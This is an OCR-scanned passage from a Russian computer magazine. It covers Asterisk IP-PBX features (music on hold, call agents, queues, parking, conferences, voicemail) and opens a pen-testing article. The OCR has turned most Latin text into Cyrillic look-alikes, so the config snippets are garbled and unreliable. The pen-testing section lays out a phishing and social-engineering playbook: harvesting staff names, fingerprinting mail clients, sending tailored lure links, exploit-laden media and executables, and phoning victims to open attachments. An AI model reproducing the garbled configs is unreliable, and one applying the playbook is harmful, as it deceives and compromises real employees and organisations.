На сервере в окне «Управление развертыванием», во вкладке «Раз- 
вертывание», должны появиться компьютеры, на которых работает 
агент, с указанием их ІР- и МАС-адресов. В этом же окне можно затем 
отслеживать ход процесса установки на каждый компьютер. Если 
все в порядке, нажатием «Управление развертыванием» запускаем 
мастер развертывания. Выбираем компьютеры, на которые будет 
производиться установка. Если их много, просто устанавливаем фла- 
жок «Все компьютеры» и выбираем шаблон развертывания. Можно 
использовать имеющийся шаблон или создать свой. При необходимо- 
сти мастер может уточнить недостающие параметры (например, имя 
компьютера) . После этого начнется процесс копирования файлов на 
удаленные компьютеры и установка системы. 

Ничто не мешает в процессе развертывания запустить агенты 
в новой группе компьютеров, начав параллельный процесс. В 
зависимости от размера образов, количества компьютеров и 
пропускной способности сети, вся процедура на современных 
компьютерах может занять порядка 10-20 минут, что, согласись, 
по сравнению с традиционной установкой, ничтожно мало. При 
этом новая система практически полностью готова к работе сразу 
по окончании установки. □С 
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ѴоІР ОСОБОГО 

НАЗНАЧЕНИЯ 



ПОЛЕЗНЫЕ ФИЧИ А5ТЕШ5К ІР-РВХ 

Возможности сервера ІР-РВХ Азііегізк не ограничиваются лишь обслуживанием звонков клиентов. В зави- 
симости от характера деятельности организации, в которой будет использоваться Азііегізк, могут понадо- 
биться и некоторые другие его возможности. Например, в службе поддержки не помешает функция пере- 
хвата или перенаправления звонков, а использование голосовой почты поможет всегда «отвечать» 
на звонки клиентов. И это далеко не все, что может этот сервер. 



мизюоыноьо 

Слушать гудки, пока абонент не снял трубку, невероятно скучно. Чтобы 
избежать неприятных ощущений, можно установить мелодию, которая 
будет проигрываться вместо гудков. В Азіегізк в качестве источника зву- 
ка можно использовать \УАѴ, МРЗ, ІІЬ, КАѴѴ и другие файлы, в том числе и 
потоковое аудио. Формат ѴѴАѴ в версии 1.4.x используется по умолчанию 
и является предпочтительным, так как отнимает меньше системных 
ресурсов. Учитывая нагрузку на канал и качество связи, 8 бит часто 
вполне достаточно, использовать файлы с лучшим качеством не стоит. 

В ранних версиях для воспроизведения МРЗ-файлов необходимо было 
установить тр§123. Сейчас разработчики Азіегізк отказались от его ис- 
пользования, и теперь для поддержки МРЗ достаточно установить пакет 
азгегізк-асісіопз. Будем считать, что мелодии подготовлены, открываем 
файл /еіс/азіегізк/тизісопііоісі.сопі и создаем новый класс, состоящий 
из нескольких директив: 

$5и00МСЕ0ІТ/ЕТС/А5ТЕРІ5К/Ми5ІС0МН0Ю.С0МР 

[попе] 

пюбе-іНІез 

с!ігесбогу=/(іеѵ/пи11 

[беіаиіб] 
тосіе => Іііез 

сіігесбогу => /ѵаг/ІіЪ/азбегізк/тоН 
гапс!от=уез 



Первый класс, обозначенный попе, будет использоваться для обеспече- 
ния тишины при помощи Мизіс оп НоШ (МОН) . Второй описывает ресурс 
для МОН. В нем мы указали режим воспроизведения файлов, каталог, в 
котором находится музыка, и установили случайное воспроизведение. 
Если файлы имеют специфический формат, который не может воспроиз- 
вести Азіегізк, или хочется задействовать потоковое аудио, полученное с 
ЗЬоиісазі: или подобного сервера, дополнительно необходимо использо- 
вать директиву арріісагіоп. Например, МРЗ с потокового сервера можно 
воспроизвести, добавив такие строки: 

тосіе = сиз С от 

арр1ісабіоп=/изг/1оса1/Ъіп/трд123 -д -г 8000 -Г 8192 -з 

--топо ИРРр : //зкоибзегѵег : 8000/ 

В качестве аргумента в арріісайоп можно использовать и скрипты, умею- 
щие воспроизводить музыку в определенном формате. Теперь в нужных 
секциях ехіепзіопз.сопі прописываем параметры МОН: 

$ 51Ш0 МСЕйІТ /ЕТС/ А5ТЕРІ5К/ЕХТЕМ5І0М5. СОМЕ 

[сЗеІаиІР ] 

; Устанавливаем класс для МОН 

ехРеп => з , 1 , ЗебМизісОпНоІсІ (беіаиір) 

[Іосаі] 

; Первым делом указываем обязательное использование 
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Апзтлег 

ехбеп => 60 00 , 1 , Апзѵ^ег 
ехбеп => 6000 , 2 ,Мизіс0пНо1с1 ( ) 

; Создаем макрос для отключения МОН 

[шасго-пошизіс] 

ехРеп =>з,1 ,№эОр ( ) 

ехбеп => з , 2 , ЗебМизісОпНоІсІ (попе) 

; Используем его для отключения при соединении по ІАХ 
[оибдоіпд] 

ехРеп => 7 020,1, ИоОр (Біаі -> ІАХ2 /оибЪоипб/$ {ЕХТЕМ} ) 
ехРеп => 7 02 0 , п, Біаі ( ІАХ2 /оибЪоипсі/$ {ЕХТЕ1Ч} , ,М (пошизі 
с) ) 

ехбеп => 7020 ,п,Напдир 

В каждом диалплане можно использовать свой класс МОН и вешать трубку 
по истечении определенного времени. Например, так: 

ехбеп => 5000 , 2 , ЗебМизісОпНоІсІ (шусіазз ) 
ехбеп => 5000 , 3 ,Ѵ/аібМизісОпНо1с1(20) 
ехбеп => 5000 , 4 , Напдир 

Здесь варианты реализации зависят от твоей фантазии. Да, и не забывай 
перезапускать Азіегізк после изменений в конфигурации: 

$ зисіо азбегізк -г 
СЫ> геіоаб 

ИСПОЛЬЗОВАНИЕ АГЕНТОВ 

Азгегізк может работать как система, автоматически распределяющая 
поступающие вызовы (АСЭ — АиФтагіс Саіі ПізігіЪигіоп) . В службах 
поддержки это очень полезная возможность. Пользователь звонит на один 
из номеров, а на звонок отвечает свободный в данное время сотрудник. 
Реализуется эта функциональность при помощи агентов, которые активи- 
руются в системе, используя специальную процедуру, и делают себя дос- 
тупными для приема вызовов. Агенты определяются в файле а§еШз.сопГ: 

$51Ш0 МСЕйІТ /ЕТС/А5ТЕРІ5К/А0ЕМТ5.СОМР 

[депегаі] 

; Сохранение статуса агентов в локальной базе (не требует 
повторной регистрации в случае перезагрузки сервера) 
регзізбепбадепбз=уез 

; Разрешение /запрет привязки нескольких агентов к одному 

экстеншену 

;ши1бір1е1одіп=уез 

[адепбз ] 



; Количество неудачных регистраций агента перед отказом 
; шах1одіпбгіез=3 

; Разрешение отключения агента, если трубка в течение 
указанного времени не снята (в секундах) 
аибо1одо11=15 

; Отключаем обязательное нажатие кнопки <#> при регист- 
рации агента 
аскса11=по 

; Время (в мс) между отключением и повторным вызовом 
агента (например, чтобы пользователь успел заполнить 
отчет) 

ѵлгарирб іте=5 0 0 0 
; Класс МОН 

тизісопііоіб = беіаиіб 

; Звуковой сигнал, проигрываемый для подключенных аген- 
тов 

сизбош_Ьеер=Ьеер 

; Звуковой файл, проигрываемый при отключении агента 
; адепбдоосПэуе => ѵш-дообЬуе 

; Членство в группах для агентов , используется в 
диеиез . сопі 
; дгоир=1,2 

; Далее описывается запись разговоров агентов; эта сек- 
ция является глобальной для канала агентов скап_адепк ; 
включение записи (по умолчанию выключена) 

; гесогбадепбса11з=уез 

; Формат файла: ѵ^аѵ (по умолчанию) , дзш, ѵ\?аѵ49 
; гесогб1огшаб=дзш 

; Строка, добавляемая к имени при записи, позволяет 
формировать ІШЬ 

; иг1рге1іх=1іРкр : / /Іосаікозб/саііз/ 

; По умолчанию записи сохраняются в /ѵаг/зрооі/азбегізк/ 
шопіког, каталог можно изменить 
; заѵеса11зіп=/ѵаг/са11з 

; Описание агентов в виде «адепб => адепбІБ, 

адепбРаззѵ^огб, имя» 

адепб => 3 001 , 1234 , Ѵазз а Риркіп 

адепк => 3 002 , 2345 , Зегд Сгіпбег 

Но следует помнить, что номера телефонов и ГО агента — это не одно и то 
же. В Азщгізк агенты не привязаны к одному номеру и могут подключаться с 
любых номеров, то есть агент — это как бы еще один виртуальный телефон. 
Кстати, эту фичу можно использовать и в том случае, если сотрудники 
постоянно перемещаются. Привязав к каждому сотруднику агента, его 
всегда можно «поймать» вне зависимости от того, какой телефон он сейчас 
использует. Применение агентов не снимает необходимости в создании 
записи для регистрации телефонав зір.сопГи экстеншенав ехщпзіопз.сопб 
При поступлении входящего звонка АзЩгізк поднимает трубку, переводя вы- 
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Очереди обработки вызовов 



зов в «отвеченное» состояние. Если все номера заняты, использование МОН 
может немного развлечь звонящего, скрасив тоскливые минуты ожидания. 
Очереди для обработки вызовов определены в файле циеиез.сопі, а 
имена очередей вызовов используются в качестве аргумента (^иеие в 
ехііепзіопз.сопЕ В циеиез.сопі все можно оставить по умолчанию, доста- 
точно добавить в конце файла описание новой очереди: 

$5и00МСЕ0ІТ/ЕТС/А5ТЕРІ5К/0иЕиЕ5.С0МР 

[МуОиеие] 

; Персональный МОН, используется, если нет ішзісопЪоісі в 

адепРз . сопР 

; тизіссіазз = ЬеРаиІР 

; Поиск свободного агента 

зРгаРеду=гіпда11 

РітеоиР=Г5 

геРгу=5 

; Вес очереди 

ме1дЬР=0 

шгарирр іте =15 

; Максимальное количество абонентов в очереди (без 
ограничений ) 
шахіеп = О 

; Когда объявлять о приблизительном времени ожидания или 
позиции абонента в очереди (0 — выключение) 
аппоипсе-Ргедиепсу = О 

; Включение в анонсы времени ожидания абонента 
(уез I по I опсе) 
аппоипсе-ЬоІсІРіте = по 

; Описание агентов, обслуживающих очередь 
шешЬег => АдепР/3001 
шешЬег => АдепР/3002 
; Группа агентов 
; шешЬег => АдепР/@1 

Кстати, здесь же можно записать агентов в качестве участников, обраба- 
тывающих указанную очередь. Поэтому некоторые параметры файлов 
а^ешз.сопР и циеиез.сопР совпадают. 

Чтобы агенты могли регистрироваться, необходимо в ехі:еп5Іоп5.сопб доба- 
вить специальные расширения и занести сам экстеншен: 

$51Ш0 МСЕЭІТ /ЕТС/А5ТЕРІ5К/ЕХТЕМ5І0М5.С0МР 

; Для регистрации 

ехРеп=> 7001 , 1 , АдепРСаІІЬаскЬодіп ( | | $ {САЫіЕКІБШМ} @ 
саіісепрег ) 

; Для выхода 

ехРеп=> 7002 , 1 , АдепРСаІІЬаскЬодіп ( | |1) 



[саіісепрег ] 
ехРеп=> 911 , 1 , Апзѵ^ег 
ехРеп=> 911 , 2 , Кіпдіпд 
ехРеп=> 911 , 3 ,МаіР (2 ) 
ехРеп=> 911 , 4 , (Діеие (МуОиеие) 
ехРеп=> 911,5,Напдир 

Теперь, чтобы зарегистрировать агента, набираем номер 7001. Вводим 
пароль и логин по подсказкам системы. После регистрации агент будет 
поставлен в очередь на обработку звонков, поступающих по номеру 911. 
Позвонив на номер 7002, можно сменить экстеншен или, нажав кнопку 
< # > , отменить регистрацию агента. 

ПАРКОВКА ВЫЗОВА 

Парковка вызова (Саіі рагкіп§) является одним из несомненных удобств, 
предоставляемых Азіегізк. Работает это так. Ты поднимаешь трубку и в 
процессе разговора понимаешь, что разбираться с проблемой должен 
другой сотрудник либо для выяснения всех обстоятельств необходимо 
перейти на другое рабочее место. Вместо того чтобы просить абонента пе- 
резвонить по другому телефону, ты, просто набирая комбинацию клавиш, 
помещаешь вызов во временный слот и, перейдя на новое место и набрав 
номер этого слота, продолжаешь разговор. Параметры парковки и ком- 
бинация для передачи вызова определяются в файле РеаШгез.сопР. После 
установки сервера в нем активированы следующие параметры: 

$ 51Ш0 МСЕОІТ /ЕТС/А5ТЕРІ5К/РЕАТІІРЕ5.С0МР 

[депегаі] 

; Экстеншен для парковки 
рагкехР =>700 
; Слоты для парковки 
рагкроз => 701-720 
; Контекст для парковки 
сопРехР => рагкесісаііз 

; Время парковки (в секундах) , после которого будет про- 
изведен вызов по первому номеру 
рагкіпдріте => 45 

; Время набора цифры при передаче вызова 

РгапзРегсІідіРРітеоиР => 3 

; Оповещения 

соигРезуРопе = Ьеер 

хРегзоипб = Ьеер 

хРегРаіІзоипсі = Ьеерегг 

; Отсылка информации на экраны АБЗІ -телефонов 
абзірагк = уез 

[ РеаРигетар] 

; Комбинация активации передачи звонка 
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Ыіпсіхбег => # 

; Разъединение 
бізсоппесб => * 

И в диалплане тех пользователей, которым разрешена парковка, подклю- 
чаем экстеншен рагкесісаііз: 

іпсіисіе => рагкебсаііз 

Теперь если во время разговора нажать клавишу < # >, а затем номер, ука- 
занный в рагкехі: (в нашем примере 700), ты услышишь номер слота, к ко- 
торому будет подключен абонент. Только набирать нужно быстро, иначе 
получишь сообщение о неудачной операции. Набрав на другом телефоне 
полученный номер слота, ты сможешь продолжить разговор. 

Теперь несколько другая ситуация, также нередкая в любом офисе, — со- 
трудник, находящийся рядом, по некоторым причинам не может ответить 
на телефонный звонок. В таком случае можно подойти к звонящему 
телефону или просто набрать определенную комбинацию плюс номер 
звонящего телефона и перехватить вызов (Саіі Ріскир) . Реализуется это 
несколькими способами. Самый простой — добавить в описание каждого 
аккаунта параметры са11§гоир и ріскир§гоир. В этом случае нажатием «*8» 
можно перехватить звонок на любой номер в пределах группы. Комби- 
нация цифр для перехвата определена в переменной ріскирехіеп в файле 
іеаШгез.сопі. В остальных случаях надо использовать функцию Ріскир: 

Ріскир (ехбепзіоп [@сопбехб] [&ехбепзіоп2@сопбехб . . .] ) 

[ хххххх ] 

ехбеп => * 8 , 1 , Ріскир ( 1111@хххххх) 
ехбеп => 1111 , 1 , Біаі ( 1111 , 60 , гбТ) 

Следует помнить, что перехват вызова работает только в пределах 
технологии 8ІР, ІАХ, 2араі:а и т.д. То есть, например, в схеме «ЗІР-телефон 
— 5ІР-телефон» Ріскир работать будет, а перехватить входящий звонок с 
обычной телефонной линии с помощью ЗІР-телефона не получится. 

КОНФЕРЕНЦИИ 

Не менее полезной функцией Азіегізк является возможность создания 
виртуальных комнат для конференций, в которых могут одновременно 
общаться все абоненты, имеющие доступ. Комнаты конференции описы- 
ваются в файле теейпе.сопі. Причем, обнаружив вызов тее№іе(), сервер 
перечитывает этот файл, поэтому при внесении в него изменений сервер 
перезапускать не требуется. 

$51Ю0 МСЕйІТ /ЕТС/А5ТЕРІ5К/МЕЕТМЕ.С0МР 

[гоотз ] 

; Описание конференции в виде 
; сопб => сопб№[,ріп] [,асішіпріп] 
сопб => 1234 
сопб => 2345,9938,0123 

Каквидишь, здесь все просто. Например, в комнату 1234 может зайти 
каждый абонент, в чей контекст она включена при помощи конструкции 
«МееіМе (сопіпо, [орйопз] ) >>. Для доступа к 2345 потребуется ввести РШ 9938, 
пин администратора — 0123. Теперь в нужный контекст добавляем строку: 

ехбеп => 500 , 1 ,МеебМе (2345 I р) 

Необязательный параметр р позволяет абоненту отключаться от конфе- 
ренции нажатием < # > . Описание остальных параметров можно найти по 
адресу ілАЛАѵ.азЩгізкуиги.сот/ШЮгіаІз/теейпе сопЫлтІ . 



той мы не настраивали. Естественно, такой полезной возможностью пренебре- 
гать нельзя. Настройки голосовыхящиков производятся в файле ѵоісетаіі.сопб. 
Параметров в нем много, большинство из них касается настройки почтового 
уведомления, сообщающего пользователю о наличии нового сообщения. 

$51Ю0 МСЕйІТ /ЕТС/А5ТЕРІ5К/Ѵ0ІСЕМАІІ-.С0МР 

[депегаі] 

; Формат файла для записи сообщения 
богтаб=ілаѵ49 I дзт | ілаѵ 
; Адрес для поля Егот е-таіі 
зегѵегетаі1=Азбегізк 

; Разрешение прикреплять ѵоісешаіі к письму 
аббасЬ=уез 

; Команда для отправки ешаіі 
шаі1сш<і=/изг/зЬіп/зепс1таі1 — б 
; таі1стсі=/изг/ехіт/Ьіп/ехіт -б 
; Временная зона 
б 2 =тозсом 

; Далее описываем контекст (ы) для голосовых ящиков; не- 
которые параметры секции депегаі здесь можно переопреде- 
лить как для всей секции, так и индивидуально 
[сіебаиіб ] 

1234 => 4242, Тезб МаіІЬох, дгіпсІег@1оса1бюзб 

4444 => 0855,Мазбег,тазбег@1оса1Ъ.озб,дгіпс1ег@иа. бт,абб 

асЬ=уез I зегѵегетаі1 = азбегізк@дгіпсІег . сот | бз=кіеѵ 

[оббісе] 

101=>2345 , ѴоісеМаіІ , , , 

102=>2345 , Ѵаз^а Риркіп, ѵаз з а@1оса1бюзб 

Здесь определено два контекста для голосовой почты: беГаик и оШсе. 
Первым идет почтовый ящик 1234 с паролем для доступа 4242, именем 
пользователя Тез! МаіІЬох и почтовым адресом §гіпбег@1оса1Ьозі:. В ящике 
4444 показано, как можно переопределить глобальные настройки для 
конкретной записи. В ящике 101 не указан почтовый адрес, что означает, 
что етаіі о наличии нового сообщения отправляться не будет. В записи 
абонента не забываем использовать параметр таі1Ъох= 102@оШсе и в 
файл ехіепзіопз.сопі (в соответствующие диалпланы) добавляем: 

$51Ю0 МСЕйІТ /ЕТС/А5ТЕРІ5К/ЕХТЕМ5І0М5.С0МР 

іпсіисіе => ѵоісешаіі 

[оббісе] 

; Записываем голосовое сообщение, если пользователь не 
снимает трубку 

ехбеп => 1234 , 1 , Біаі (8ІР/1234,20) 
ехбеп => 1234 , 2 , Ѵоісешаіі ( 1234@бебаи1б ) 

; Циркулярный голосовой ящик для 101 и 102 
ехбеп => 100 , 1 , ѴоісеМаіІ (и101&102 ) 

; Проверка наличия сообщений в 101 

; Флаг 'з' означает, что пароль при проверке сообщений 
вводить не нужно 

ехбеп => 111 , 1 , ѴоісеМаіІМаіп ( з101@оббісе) 

; Если имеется несколько почтовых ящиков в диапазо- 
не 100-199, можно разрешить оставлять в них сообщения 
напрямую после набора «*» и номера расширения (флаг 'и' 

— ІІпаѵаіІаЫе-сообщение) 

ехбеп => _*1ХХ, 1 , ѴоісеМаіІ (и${ЕХТЕЫ: 1} ) 

ехбеп => _* ІХХ , 2 , Напдир 



РАБОТА С ГОЛОСОВОЙ ПОЧТОЙ Кстати, по адресу готік-у.1іѵеіоигпа1.сот/19022.Ьі:т1 доступна таблица 

В статье «Строим телефонную сеть» из ноябрьского номера ] [ запрошлый год перевода сообщений (с английского на русский) голосового ящика для 

я применил в одном из расширений команду ѴоісеМаіІ, но работу сголосовой поч- Азіегізк 1.4.х. т 
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Пен-тестинг по обе 

СТОРОНЫ СЕРВЕРА 



ТЕСТЫ НА ПРОНИКНОВЕНИЕ: СОВЕТЫ ПРАКТИКУЮЩИМ АДМИНАМ И ХАКЕРАМ 

Популярность пен-тестов отчасти вызвана абсолютным непониманием целей, стоящих перед пен-тесте- 
ром, а также методов их достижения. Заказывая тест на проникновение, администратор в большинстве 
случаев выбрасывает деньги на ветер, не получая взамен никакой информации о реальных угрозах и 
дефектах системы безопасности, но чтобы понять это, нужно хотя бы на время превратиться в хакера и 
взглянуть на задачу с позиции атакующего. Мыщъх раскрывает боевые секреты пен-тестеров, которые 
наверняка заинтересуют как администраторов, так и хакеров. 



ыщъх долго занимался пен-тестами, хотя не особо это афи- 
шировал. Методом проб и ошибок был выработан четкий и 
эффективный план действий, позволяющий проникать внутрь 
защищенных сетей с минимальными усилиями и практически 
без отрыва от основного «делопроизводства», то есть фактически в полном 
бэкграунде. И вот теперь этот план, отшлифованный до зеркального блеска, 
мыщъх выносит на всеобщее обозрение. 

СКАНЕРЫ БЕЗОПАСНОСТИ 

Сканеры безопасности (типаХЗрібег) срабатывают только в клинических 
случаях, например, когда администратор — лось, который идет лесом. 
Обычно, перед тем как заказать тест на проникновение, клиент делает все, 
что только может сделать: устанавливает последнюю версию антивируса 



для поиска уже внедренных руткитов, скачивает свежие заплатки, прого- 
няет один или несколько сканеров безопасности — и только после этого 
приглашает пен-тестеров. 

Конечно, пен-тест может проводиться и без ведома администратора с 
подачи руководства компании, что существенно упрощает задачу атакую- 
щего, вот только удаленные способы определения установленных заплаток 
можно по пальцам пересчитать. Практически все известные мне сканеры 
работают в мягком режиме, используя косвенные эвристические подходы (в 
общем случае сводящиеся к определению версии ПО), не решаясь на прямое 
переполнение буферов в силу небезопасности этой операции. Запускать 
эксплойты один за другим и то выгоднее ! 

Пен-тестер просто не может полагаться на сканеры безопасности, поскольку 
ему платят не за сканирование сети, а только за реальные проникновения ! 
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ѴѴПЙЛІѴ 



СП5 сервер 



ц 

уоЬ» 



ѴѴеЬ-сервер в демилитаризованной зоне 






ЯЛГ 



дтлкующиіі 



Поэтому приходится орудовать своими лапами и хвостом, вгрызаясь в 
защитный периметр острыми хакерскими зубами. 

ЦЕЛЬ ОПРЕДЕЛЯЕТ СРЕДСТВА! 

Обычно зесигііу-консультанты имеют полный доступ ко всем уголкам сети и 
после тщательного анализа схемы безопасности передают администратору 
многостраничный отчет с перечнем явных и потенциальных дыр, а также 
рекомендациями по их устранению. Как правило, зесигііу-консультант 
получает деньги независимо от количества обнаруженных дыр, и его труд 
оплачивается, даже если никаких дыр он вообще не нашел, что очень даже 
здорово, однако здесь есть по меньшей мере два серьезных но. 

Первое — это ответственность за полноту предоставляемой информации. 
Заказчиком явно или неявно предполагается, что консультант найдет все 
дыры, включая еще никому не известные, что невозможно по определению! 
Вот только заказчику этого не объяснишь, и если спустя некоторое время его 
атакуют, то, возможно, придется сделать топеу Ъаск, а то и компенсировать 
ущерб, иначе чего доброго разъяренный заказчик может и морду набить. 
Следовательно, консультант должен в совершенстве владеть «пальцовкой» и 
выглядеть достаточно внушительно, создавая впечатление, что за спиной у 
него находятся могущественные силы, способные его защитить :) . 

Второе. Заказчик тоже не дураки, вероятнее всего, попытается обхитрить 
консультанта, а поводов, чтобы не платить деньги, можно придумать 
много. Например, внедрить закладку в свою собственную систему безо- 
пасности, которую консультант ни за что не найдет, а потом, получив отчет, 
указать на нее пальцем и возмутиться, что в отчете ее нет. Естественно, 
это сильно упрощенная схема. На практике заказчик обычно оставляет в 
системе безопасности N дыр, из которых консультант находит только К, что 
позволяет заказчику оценить степень полноты анализа, нижняя граница 
которого находится на уровне К/К. Если это соотношение окажется удруча- 
юще велико, консультант будет послан в пешее эротическое путешествие. 
Вердикт: администратор — будь бдителен и не дай себя обмануть, консуль- 
тант — не думай, что удастся срубить капусты за просто так! 

Пен-тестерам (за редкими исключениями) не дают никакой информации, 
кроме той, которую они могут получить самостоятельно через публичные 
источники, при этом, если пен-тестер не сможет проникнуть в систему, он 
не получает вообще ничего. То есть заказчик оплачивает только реальные 
взломы. На первый взгляд кажется, что заказчик находится в выигрышном 
положении, а пен-тестеру вообще ничего не светит и лучше сразу уйти в 



консалтинг, на самом же деле все с точностью до наоборот! От пен-тестера 
не требуется полнота анализа, и он вообще ни за что не отвечает! Пен-тестер 
не подряжался искать все дыры. Достаточно найти хотя бы одну, оставив в 
системе заранее оговоренный флаг присутствия, доказывающий успеш- 
ность ее компрометации (например, создать в приватной директории файл 
с текстом «Наскеб»), — и все, кто не спрятался, я не виноват! Сушите весла, 
господа! Пен-тестер выполняет поверхностный анализ, используя крат- 
чайшие пути для достижения цели, не имеющие ничего общего с реальной 
картиной (не) безопасности системы. В то время как задача зесигііу-консуль- 
танта заключается в анализе общей защищенности, пен-тестер проникает 
внутрь охраняемого периметра, используя фиксированный набор шаблон- 
ных заготовок. 

Ментальная ошибка заказчиков состоит в том, что они считают, будто бы 
пен-тестер ищет уязвимости, в то время как он действует по заранее проду- 
манной стратегии, в которую анализ конкретных ситуаций не входит. Если 
принять, что защищенность системы — это 1(х) , то вектор действий пен-тес- 
тера — это константа. Так за что же мы платим пен-тестеру деньги? ! 

П0СТАН0ВКАЗАДАЧИ 

Типичный пен-тестинг начинается приблизительно так. Заказчик дает 
ІР-адрес публичного ѵѵеЪ-сервера компании и требует от нас, чтобы мы 
забрались внутрь локальной корпоративной сети (с ѵѵеЪ-сервером зачастую 
никак не связанной) и. . . наследили там, отметив свое местопребывание. 
Внедрили $Ье11 или создали дисковый файл/запись в закрытой базе данных. 
Последние два пункта более предпочтительны, поскольку забраться в ло- 
кальную сеть намного сложнее, чем выбраться оттуда, и с зйеІГом тут могут 
возникнуть траблы различной тяжести. 

Ломать ѵѵеЪ-сервер смысла никакого нет, поскольку даже если он и соединен 
с локальной сетью, то в 9 из 10 случаев находится в демилитаризованной 
зоне, огражденной брандмауэром, а это значит, что, захватив контроль 
над ѵѵеЪ-сервером, мы все равно не войдем внутрь сети, пока не хакнем 
брандмауэр. Зачем нам это нужно? ! Лучше атаковать непосредственно саму 
локальную сеть путем рассылки электронных писем с боевой начинкой или 
линками на «заминированные» ІЛтІ-страницы или файлы документов. 
Подробнее об этом мы поговорим ниже, а пока рассмотрим комплекс 
подготовительных мероприятий, предшествующих атаке. Почему-то 
большинство заказчиков думает, что пен-тестер начинает работать толь- 
ко после подписания договора. Ага, разбежались! Переговоры занимают 
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достаточно длительное время, которое пен-тестер может (и должен!) 
использовать с пользой для дела. Во-первых, в это время администратор 
еще не на стреме и вероятность успешной атаки выше; во-вторых, в ходе 
подготовительных мероприятий пен-тестер оценивает свои шансы и, если 
эти шансы скорее малы, чем велики, ставит заказчика в позу. Заказчик 
отказывается от услуг пен-тестера, и обе стороны остаются довольны. 
Естественно, атаковать компанию, не имея на руках бумаги, подтвержда- 
ющей законность наших полномочий, нужно очень осторожно. Совершать 
противоправные действия при этом категорически недопустимо, но этого, 
собственного, и не требуется. Первым делом пен-тестер пытается ответить 
на вопросы: что это за компания? каким бизнесом она занимается? с кем 
сотрудничает? что за имена у ее сотрудников и партнеров? Получить эту 
информацию можно как с помощью социальной инженерии, выдавая 
себя за другое лицо (обычно высокопоставленное), такичестным путем, 
представившись потенциальным клиентом. Очень дотошным клиентом. 

И состоятельным. Короче, таким, с которым компания заказчика будет вы- 
нуждена подолгу базарить, передавая его то одному, то другому сотруднику. 
Проще всего это сделать по телефону, но и об электронной почте забывать 
не следует. Хотя это не есть социальная инженерия, поскольку мы никого не 
«инженируем», а просто собираем необходимую для атаки информацию: 
имена сотрудников, электронные адреса, названия отделов, еЩ. 

Если повезет, то удастся выяснить и личные предпочтения некоторых 
сотрудников (сотрудниц) , например узнать, что кто-то без ума от группы 
«Мама, роди меня обратно». Тогда можно тут же переслать по электронной 
почте «заряженный» клип или трЗ (благо ошибки переполнения в аудио- и 
видеоплеерах в изобилии) . Но это крайний случай. Будем исходить из того, 
что фортуна повернулась к нам задом и все девушки на фирме либо лесби- 
янки, либо феминистки. С мужчинами они разговаривают сугубо деловым 
тоном, с которого не съезжают ни при каких обстоятельствах. 

УДАРНАЯ ФАЗА АТАКИ 

Имея на руках список электронных адресов, рассылаем на них обыкно- 
венные (то есть ничем не начиненные) письма, на которые жертва просто 
обязана что-то ответить. О бесплатных ящиках типа таіі. т лучше сразу 
забыть — они нещадно давятся спам-фильтрами, да и выглядят несолидно. 
Какие проблемы в том, чтобы зарегистрировать несколько доменов третье- 
го уровня в зоне .сот.ш, например? Собственный сервер, по современным 
понятиям, уже давно не роскошь, особенно для ІТ-специалистов, коим, безу- 
словно, является пен-тестер. В идеале, конечно, следовало бы порекомендо- 
вать домены второго уровня, но это совсем не обязательно. 

Также письмо должно адресоваться конкретному лицу с указанием имени 
и отдела, что создаст у жертвы впечатление, что она имеет дело с «пра- 
вильным» человеком. Представляться партнером (или потенциальным 



клиентом) компании можно и нужно, а вот выдавать себя за постороннее 
лицо, даже имея договор о пен-тестинге на руках, — слишком рискованно. 

К тому же в последнем случае шансы на удачную атаку не увеличиваются, 
а уменьшаются, поскольку выдавать себя можно только за того, кого мы 
очень хорошо знаем. Получив ответ, смотрим на заголовок письма, опреде- 
ляя тип и версию почтового клиента, а в ряде случаев и версию операцион- 
ной системы. Соответственно, кидая жертве линк на подконтрольный нам 
ѵѵеЪ-сервер, мы определяем версию и тип браузера. Какова вероятность, что 
жертва кликнет по ссылке? Судя по моей практике, это происходит в 8 из 10 
случаев, если используется доменный уровень в зоне типа сот.ш, и по мень- 
шей мере в 2-3 из 10, если это нагой. ш или что-то подобное. Главное — это не 
домен, а мотивация. Письмо с текстом типа: «А вот мы тут подготовили кле- 
вую презентацию, взгляните» — навряд ли вызовет жгучий интерес. Другое 
дело : «Я купил ваш товар, а он оказался дефектный, в магазине мне сказали, 
что не гарантийная ситуация, потому что. . . бла-бла-бла, и посоветовали 
обратиться непосредственно к вам. Вот фото дефекта крупным планом: [Нпк 
на)р§] ». Конечно, текст письма предельно упрощен, но общий смысл в це- 
лом передан. Если составить письмо юридически грамотно (для чего можно 
воспользоваться услугами юриста) и в вдобавок упомянуть реальные имена 
сотрудников и отделов, то с вероятностью 99,9% они щелкнут по ссылке, 
чтобы разобраться в ситуации. Впрочем, учитывая, что по меньшей мере в 
90% случаев почтовые клиенты настроены на автоматическое отображе- 
ние внешних картинок в НТМБ-письмах, можно ничего не мутить. Ссылка 
откроется и без телодвижений со стороны жертвы. 

Зная же версию почтового клиента/операционной системы/браузера, 
смотрим, какие в ней есть дыры. Для этого достаточно зайти на Зесигііу 
Еосиз или любой другой подобный ресурс и заточить. А точить можно много 
чего! Например, Ехсеі и ѴѴогсІ, уже давно ставшие стандартом де-факто, 
содержат огромное количество дыр. Впрочем, учитывая уровень компью- 
терной (без) грамотности большинства сотрудников, посылки исполняе- 
мого файла во вложении зачастую оказывается вполне достаточно, и его 
открывают, особенно если найти убедительный повод, создающий у жертвы 
непреодолимую мотивацию служебного или неслужебного типа. 

Как показывает мой опыт, легче всего клюют на эту удочку пользователи со 
средним уровнем подготовки. Совсем уж безграмотные просто не знают, что 
с этим вложением делать, а достаточно продвинутые, прежде чем запустить 
ехе, обязательно проконсультируются с администратором или просто 
посмеются над хакером. Уровень пользователей легко определяется в ходе 
предварительной разведки, после чего в ударной фазе атаки остается только 
позвонить по телефону голосом и сказать, что вот, мол, мы послали вам гаг- 
архив с накладными, но не уверены, что все правильно упаковали и нигде 
не накосячили; откройте его, пожалуйста, и подтвердите успешность своего 
заражения :) . И ведь открывают! 
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ТУЗЫ В РУКАВЕ, ИЛИ ЧЕСТНЫЕ ПРИЕМЫ НЕЧЕСТНОЙ ИГРЫ 

На момент написания этих строк, по данным компании Зесипіа, в ІЕ 
содержалось семь незалатанных дыр, в Горящем Лисе — пять, в Опере — ни 
одной, да только кто же эту Оперу использует! «Незалатанными» в данном 
случае мы называем дыры, под которые компания-разработчик еще не 
выпустила заплаток безопасности, из чего следует, что вся атака сводится к 
заманиванию пользователя на «заминированный» сайт. 

Конечно, количество незалатанных дыр не остается постоянным, и в опре- 
деленные моменты времени падает до нуля, существенно затрудняя атаку. 
Пен-тестеру остается надеяться лишь на то, что администратор забыл /по- 
